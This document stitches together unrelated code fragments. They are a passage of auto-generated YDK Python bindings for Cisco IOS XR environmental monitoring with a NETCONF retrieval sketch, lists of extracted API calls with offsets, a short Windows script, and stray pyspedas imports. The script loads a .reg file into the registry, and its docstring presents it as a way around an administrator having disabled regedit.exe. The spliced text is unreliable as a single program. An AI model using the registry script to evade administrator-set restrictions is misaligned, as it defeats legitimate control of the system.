from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes']['meta_info']
class Power(_Entity_):
"""
Module Power Draw
.. attribute:: power_bag
Detailed power bag information
**type**\: :py:class:`PowerBag <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power, self).__init__()
self.yang_name = "power"
self.yang_parent_name = "module"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("power-bag", ("power_bag", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag))])
self._leafs = OrderedDict()
self.power_bag = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag()
self.power_bag.parent = self
self._children_name_map["power_bag"] = "power-bag"
self._segment_path = lambda: "power"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power, [], name, value)
class PowerBag(_Entity_):
"""
Detailed power bag information
.. attribute:: power_value
Current Power Value of the Unit
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: power_max_value
Max Power Value of the Unit
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: power_unit_multiplier
Unit Multiplier of Power
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_accuracy
Accuracy of the Power Value
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_measure_caliber
Measure Caliber
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_current_type
Current Type of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_origin
The Power Origin of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_admin_state
Admin Status of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_oper_state
Oper Status of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_state_enter_reason
Enter Reason for the State
**type**\: str
**length:** 0..50
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag, self).__init__()
self.yang_name = "power-bag"
self.yang_parent_name = "power"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('power_value', (YLeaf(YType.int32, 'power-value'), ['int'])),
('power_max_value', (YLeaf(YType.int32, 'power-max-value'), ['int'])),
('power_unit_multiplier', (YLeaf(YType.uint32, 'power-unit-multiplier'), ['int'])),
('power_accuracy', (YLeaf(YType.uint32, 'power-accuracy'), ['int'])),
('power_measure_caliber', (YLeaf(YType.uint32, 'power-measure-caliber'), ['int'])),
('power_current_type', (YLeaf(YType.uint32, 'power-current-type'), ['int'])),
('power_origin', (YLeaf(YType.uint32, 'power-origin'), ['int'])),
('power_admin_state', (YLeaf(YType.uint32, 'power-admin-state'), ['int'])),
('power_oper_state', (YLeaf(YType.uint32, 'power-oper-state'), ['int'])),
('power_state_enter_reason', (YLeaf(YType.str, 'power-state-enter-reason'), ['str'])),
])
self.power_value = None
self.power_max_value = None
self.power_unit_multiplier = None
self.power_accuracy = None
self.power_measure_caliber = None
self.power_current_type = None
self.power_origin = None
self.power_admin_state = None
self.power_oper_state = None
self.power_state_enter_reason = None
self._segment_path = lambda: "power-bag"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag, ['power_value', 'power_max_value', 'power_unit_multiplier', 'power_accuracy', 'power_measure_caliber', 'power_current_type', 'power_origin', 'power_admin_state', 'power_oper_state', 'power_state_enter_reason'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks']['meta_info']
def clone_ptr(self):
self._top_entity = EnvironmentalMonitoring()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring']['meta_info']
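# A minimal retrieval sketch (not part of the generated bindings; the device
# address and credentials below are placeholders): EnvironmentalMonitoring is
# a top-level entity, so it can be fetched over NETCONF with ydk's CRUDService.
if __name__ == '__main__':
    from ydk.providers import NetconfServiceProvider
    from ydk.services import CRUDService

    # Hypothetical lab device running IOS XR -- replace with a real address.
    provider = NetconfServiceProvider(address='192.0.2.1',
                                       username='admin', password='admin')
    envmon = CRUDService().read(provider, EnvironmentalMonitoring())
    for rack in envmon.racks.rack:
        print(rack.rack)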
|
[
"collections.OrderedDict",
"ydk.types.YLeaf",
"ydk.types.YList"
] |
[((1787, 1853), 'collections.OrderedDict', 'OrderedDict', (["[('racks', ('racks', EnvironmentalMonitoring.Racks))]"], {}), "([('racks', ('racks', EnvironmentalMonitoring.Racks))])\n", (1798, 1853), False, 'from collections import OrderedDict\n'), ((1876, 1889), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1887, 1889), False, 'from collections import OrderedDict\n'), ((3153, 3222), 'collections.OrderedDict', 'OrderedDict', (["[('rack', ('rack', EnvironmentalMonitoring.Racks.Rack))]"], {}), "([('rack', ('rack', EnvironmentalMonitoring.Racks.Rack))])\n", (3164, 3222), False, 'from collections import OrderedDict\n'), ((3249, 3262), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (3260, 3262), False, 'from collections import OrderedDict\n'), ((3288, 3299), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (3293, 3299), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((4828, 4905), 'collections.OrderedDict', 'OrderedDict', (["[('slots', ('slots', EnvironmentalMonitoring.Racks.Rack.Slots))]"], {}), "([('slots', ('slots', EnvironmentalMonitoring.Racks.Rack.Slots))])\n", (4839, 4905), False, 'from collections import OrderedDict\n'), ((6747, 6832), 'collections.OrderedDict', 'OrderedDict', (["[('slot', ('slot', EnvironmentalMonitoring.Racks.Rack.Slots.Slot))]"], {}), "([('slot', ('slot', EnvironmentalMonitoring.Racks.Rack.Slots.Slot))]\n )\n", (6758, 6832), False, 'from collections import OrderedDict\n'), ((6862, 6875), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (6873, 6875), False, 'from collections import OrderedDict\n'), ((6909, 6920), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (6914, 6920), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((8682, 8781), 'collections.OrderedDict', 'OrderedDict', (["[('modules', ('modules', EnvironmentalMonitoring.Racks.Rack.Slots.Slot.\n Modules))]"], {}), "([('modules', ('modules', EnvironmentalMonitoring.Racks.\n Slots.Slot.Modules))])\n", (8693, 8781), False, 'from collections import OrderedDict\n'), ((10836, 10940), 'collections.OrderedDict', 'OrderedDict', (["[('module', ('module', EnvironmentalMonitoring.Racks.Rack.Slots.Slot.\n Modules.Module))]"], {}), "([('module', ('module', EnvironmentalMonitoring.Racks.Slots\n .Slot.Modules.Module))])\n", (10847, 10940), False, 'from collections import OrderedDict\n'), ((10978, 10991), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (10989, 10991), False, 'from collections import OrderedDict\n'), ((11035, 11046), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (11040, 11046), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((4980, 5007), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""rack"""'], {}), "(YType.uint32, 'rack')\n", (4985, 5007), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((13618, 13840), 'collections.OrderedDict', 'OrderedDict', (["[('sensor-types', ('sensor_types', EnvironmentalMonitoring.Racks.Rack.Slots\n .Slot.Modules.Module.SensorTypes)), ('power', ('power',\n EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power))]"], {}), "([('sensor-types', ('sensor_types', EnvironmentalMonitoring.\n Racks.Rack.Slots.Slot.Modules.Module.SensorTypes)), ('power', ('power',\n EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power))])\n", (13629, 13840), False, 'from collections import OrderedDict\n'), ((16579, 16716), 'collections.OrderedDict', 'OrderedDict', (["[('sensor-type', ('sensor_type', EnvironmentalMonitoring.Racks.Rack.Slots.\n Slot.Modules.Module.SensorTypes.SensorType))]"], {}), "([('sensor-type', ('sensor_type', EnvironmentalMonitoring.Racks.\n Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType))])\n", (16590, 16716), False, 'from collections import OrderedDict\n'), ((16762, 16775), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (16773, 16775), False, 'from collections import OrderedDict\n'), ((16832, 16843), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (16837, 16843), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((64131, 64256), 'collections.OrderedDict', 'OrderedDict', (["[('power-bag', ('power_bag', EnvironmentalMonitoring.Racks.Rack.Slots.Slot.\n Modules.Module.Power.PowerBag))]"], {}), "([('power-bag', ('power_bag', EnvironmentalMonitoring.Racks.Rack\n .Slots.Slot.Modules.Module.Power.PowerBag))])\n", (64142, 64256), False, 'from collections import OrderedDict\n'), ((64302, 64315), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (64313, 64315), False, 'from collections import OrderedDict\n'), ((8867, 8891), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""slot"""'], {}), "(YType.str, 'slot')\n", (8872, 8891), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((19389, 19540), 'collections.OrderedDict', 'OrderedDict', (["[('sensor-names', ('sensor_names', EnvironmentalMonitoring.Racks.Rack.Slots\n .Slot.Modules.Module.SensorTypes.SensorType.SensorNames))]"], {}), "([('sensor-names', ('sensor_names', EnvironmentalMonitoring.\n Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames))])\n", (19400, 19540), False, 'from collections import OrderedDict\n'), ((70666, 70681), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\n', (70677, 70681), False, 'from collections import OrderedDict\n'), ((22417, 22582), 'collections.OrderedDict', 'OrderedDict', (["[('sensor-name', ('sensor_name', EnvironmentalMonitoring.Racks.Rack.Slots.\n Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName))]"], {}), "([('sensor-name', ('sensor_name', EnvironmentalMonitoring.Racks.\n Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.\n SensorName))])\n", (22428, 22582), False, 'from collections import OrderedDict\n'), ((22631, 22644), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (22642, 22644), False, 'from collections import OrderedDict\n'), ((22709, 22720), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (22714, 22720), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((13940, 13966), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""module"""'], {}), "(YType.str, 'module')\n", (13945, 13966), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((26810, 27155), 'collections.OrderedDict', 'OrderedDict', (["[('thresholds', ('thresholds', EnvironmentalMonitoring.Racks.Rack.Slots.\n Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.\n Thresholds)), ('value-detailed', ('value_detailed',\n EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.\n SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed))]"], {}), "([('thresholds', ('thresholds', EnvironmentalMonitoring.Racks.\n Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.\n SensorName.Thresholds)), ('value-detailed', ('value_detailed',\n EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.\n SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed))])\n", (26821, 27155), False, 'from collections import OrderedDict\n'), ((30987, 31169), 'collections.OrderedDict', 'OrderedDict', (["[('threshold', ('threshold', EnvironmentalMonitoring.Racks.Rack.Slots.Slot.\n Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds\n .Threshold))]"], {}), "([('threshold', ('threshold', EnvironmentalMonitoring.Racks.Rack\n .Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.\n SensorName.Thresholds.Threshold))])\n", (30998, 31169), False, 'from collections import OrderedDict\n'), ((31226, 31239), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (31237, 31239), False, 'from collections import OrderedDict\n'), ((31310, 31321), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (31315, 31321), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((56519, 56534), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\n', (56530, 56534), False, 'from collections import OrderedDict\n'), ((19658, 19682), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""type"""'], {}), "(YType.str, 'type')\n", (19663, 19682), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((35734, 35940), 'collections.OrderedDict', 'OrderedDict', (["[('value-detailed', ('value_detailed', EnvironmentalMonitoring.Racks.Rack.\n Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName\n .Thresholds.Threshold.ValueDetailed))]"], {}), "([('value-detailed', ('value_detailed', EnvironmentalMonitoring.\n Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames\n .SensorName.Thresholds.Threshold.ValueDetailed))])\n", (35745, 35940), False, 'from collections import OrderedDict\n'), ((70811, 70844), 'ydk.types.YLeaf', 'YLeaf', (['YType.int32', '"""power-value"""'], {}), "(YType.int32, 'power-value')\n", (70816, 70844), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((70922, 70959), 'ydk.types.YLeaf', 'YLeaf', (['YType.int32', '"""power-max-value"""'], {}), "(YType.int32, 'power-max-value')\n", (70927, 70959), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71043, 71087), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""power-unit-multiplier"""'], {}), "(YType.uint32, 'power-unit-multiplier')\n", (71048, 71087), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71164, 71201), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""power-accuracy"""'], {}), "(YType.uint32, 'power-accuracy')\n", (71169, 71201), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71285, 71329), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""power-measure-caliber"""'], {}), "(YType.uint32, 'power-measure-caliber')\n", (71290, 71329), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71410, 71451), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""power-current-type"""'], {}), "(YType.uint32, 'power-current-type')\n", (71415, 71451), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71526, 71561), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""power-origin"""'], {}), "(YType.uint32, 'power-origin')\n", (71531, 71561), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71641, 71681), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""power-admin-state"""'], {}), "(YType.uint32, 'power-admin-state')\n", (71646, 71681), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71760, 71799), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""power-oper-state"""'], {}), "(YType.uint32, 'power-oper-state')\n", (71765, 71799), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71886, 71930), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""power-state-enter-reason"""'], {}), "(YType.str, 'power-state-enter-reason')\n", (71891, 71930), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((42402, 42417), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\n', (42413, 42417), False, 'from collections import OrderedDict\n'), ((27275, 27299), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""name"""'], {}), "(YType.str, 'name')\n", (27280, 27299), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((27381, 27412), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""value-brief"""'], {}), "(YType.str, 'value-brief')\n", (27386, 27412), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((56698, 56742), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""field-validity-bitmap"""'], {}), "(YType.uint32, 'field-validity-bitmap')\n", (56703, 56742), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((56835, 56873), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""device-description"""'], {}), "(YType.str, 'device-description')\n", (56840, 56873), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((56953, 56978), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""units"""'], {}), "(YType.str, 'units')\n", (56958, 56978), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57062, 57094), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""device-id"""'], {}), "(YType.uint32, 'device-id')\n", (57067, 57094), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57174, 57202), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""value"""'], {}), "(YType.uint32, 'value')\n", (57179, 57202), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57287, 57320), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""alarm-type"""'], {}), "(YType.uint32, 'alarm-type')\n", (57292, 57320), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57404, 57436), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""data-type"""'], {}), "(YType.uint32, 'data-type')\n", (57409, 57436), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57516, 57544), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""scale"""'], {}), "(YType.uint32, 'scale')\n", (57521, 57544), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57628, 57660), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""precision"""'], {}), "(YType.uint32, 'precision')\n", (57633, 57660), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57741, 57770), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""status"""'], {}), "(YType.uint32, 'status')\n", (57746, 57770), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57859, 57896), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""age-time-stamp"""'], {}), "(YType.uint32, 'age-time-stamp')\n", (57864, 57896), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57982, 58016), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""update-rate"""'], {}), "(YType.uint32, 'update-rate')\n", (57987, 58016), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((58098, 58127), 'ydk.types.YLeaf', 'YLeaf', (['YType.int32', '"""average"""'], {}), "(YType.int32, 'average')\n", (58103, 58127), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((58209, 58238), 'ydk.types.YLeaf', 'YLeaf', (['YType.int32', '"""minimum"""'], {}), "(YType.int32, 'minimum')\n", (58214, 58238), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((58320, 58349), 'ydk.types.YLeaf', 'YLeaf', (['YType.int32', '"""maximum"""'], {}), "(YType.int32, 'maximum')\n", (58325, 58349), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((58432, 58462), 'ydk.types.YLeaf', 'YLeaf', (['YType.int32', '"""interval"""'], {}), "(YType.int32, 'interval')\n", (58437, 58462), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((36085, 36109), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""type"""'], {}), "(YType.str, 'type')\n", (36090, 36109), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((36192, 36220), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""trap"""'], {}), "(YType.boolean, 'trap')\n", (36197, 36220), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((36311, 36342), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""value-brief"""'], {}), "(YType.str, 'value-brief')\n", (36316, 36342), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((42594, 42635), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""threshold-severity"""'], {}), "(YType.uint32, 'threshold-severity')\n", (42599, 42635), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((42736, 42777), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""threshold-relation"""'], {}), "(YType.uint32, 'threshold-relation')\n", (42741, 42777), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((42875, 42913), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""threshold-value"""'], {}), "(YType.uint32, 'threshold-value')\n", (42880, 42913), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((43016, 43060), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""threshold-evaluation"""'], {}), "(YType.boolean, 'threshold-evaluation')\n", (43021, 43060), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((43174, 43228), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""threshold-notification-enabled"""'], {}), "(YType.boolean, 'threshold-notification-enabled')\n", (43179, 43228), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n')]
|
"""
Hacky way to load a .reg file into the registry when regedit.exe has been disabled by the administrator
Probably very fragile!
"""
import sys
import winreg
def load_reg(input_file):
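    # Note: regedit exports .reg files as UTF-16-LE, hence the explicit
    # encoding below. Lines that are not simple "name"="value" pairs
    # (blank lines, hex blobs) will break the naive split('=') parsing.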
    lines = open(input_file, encoding='utf-16-le').read().splitlines()
    hkey = None
    for line in lines:
        if line.startswith('[HKEY'):
            hkey = line[1:-1]
            toplevel, sub_key = hkey.split('\\', maxsplit=1)
            top = getattr(winreg, toplevel)
            hkey = winreg.CreateKey(top, sub_key)
            print(f'inkey: {hkey}')
            continue
        if hkey is None:
            continue
        # Parse and load
        name, value = line.split('=')
        name = name.replace('"', '')
        value = value.replace('"', '')
        winreg.SetValueEx(hkey, name, 0, winreg.REG_SZ, value)


if __name__ == '__main__':
    filename = sys.argv[1]
    load_reg(filename)
|
[
"winreg.CreateKey",
"winreg.SetValueEx"
] |
[((774, 828), 'winreg.SetValueEx', 'winreg.SetValueEx', (['hkey', 'name', '(0)', 'winreg.REG_SZ', 'value'], {}), '(hkey, name, 0, winreg.REG_SZ, value)\n', (791, 828), False, 'import winreg\n'), ((493, 523), 'winreg.CreateKey', 'winreg.CreateKey', (['top', 'sub_key'], {}), '(top, sub_key)\n', (509, 523), False, 'import winreg\n')]
|
import os
from pyspedas.utilities.dailynames import dailynames
from pyspedas.utilities.download import download
from pyspedas.analysis.time_clip import time_clip as tclip
from pytplot import cdf_to_tplot
from .config import CONFIG
